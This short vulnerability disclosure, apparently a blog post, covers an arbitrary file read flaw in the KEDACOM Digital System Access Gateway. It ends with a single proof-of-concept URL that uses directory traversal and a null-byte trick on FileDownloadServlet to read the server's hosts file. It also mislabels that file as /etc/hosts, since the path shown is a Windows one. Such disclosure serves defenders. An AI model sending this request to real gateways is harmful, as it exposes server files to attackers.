Kedacom Digital System Access Gateway Any File Reading Vulnerability
Kedacom Digital System Access Gateway Any File Reading Vulnerability
KEDACOM Digital System Access Gateway Arbitrary File Reading Vulnerability
Vulnerability Description
KEDACOM Digital System Access Gateway There is a vulnerability to read any file on the server. The attacker can read any file on the server by constructing a request.
Vulnerability Impact
KEDACOM Digital System Access Gateway
Network surveying and mapping
Vulnerability reappears
The login page is as follows
Read /etc/hosts using POC
/gatewayweb/FileDownloadServlet?fileName=test.txt&filePath=../../../../../../../../../../Windows/System32/drivers/etc/hosts%00.jpg&type=2
This post is licensed under CC BY 4.0 by the author.